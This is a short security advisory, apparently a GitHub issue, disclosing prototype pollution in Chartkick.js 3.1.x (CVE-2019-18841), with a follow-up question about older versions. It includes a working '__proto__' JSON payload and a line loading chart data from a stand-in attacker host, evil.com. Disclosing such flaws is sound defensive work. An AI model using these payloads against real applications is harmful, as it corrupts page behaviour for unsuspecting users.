Prototype Pollution in Chartkick.js 3.1.x
Closed this issue · 2 comments
Under certain conditions, the 3.1.x series of Chartkick.js is vulnerable to prototype pollution. This is same type of issue that was announced for jQuery and other popular libraries earlier this year. jQuery rated this a "minor vulnerability". It's certainly unintended behavior, but since Chartkick.js is a client-side only library, its impact is likely limited. This vulnerability has been assigned the CVE identifier CVE-2019-18841.
Versions Affected: 3.1.0 to 3.1.3
Fixed Versions: 3.2.0
Versions Unaffected: < 3.1.0
Impact
Passing untrusted input to JSON.parse
and the result to Chartkick.js can pollute Object.prototype
.
var badOptions = JSON.parse('{"__proto__": {"test": true}}')
new Chartkick.LineChart("chart", data, badOptions)
console.log("test" in {})
A specially crafted response in data loaded via URL can cause pollution well.
new Chartkick.LineChart("chart", "https://evil.com/data")
All users running an affected release should upgrade immediately.
Hi, are you sure this vulnerability does not exists before ? In 2.1.0, I saw some lines that looks like those fixed.
Cheers,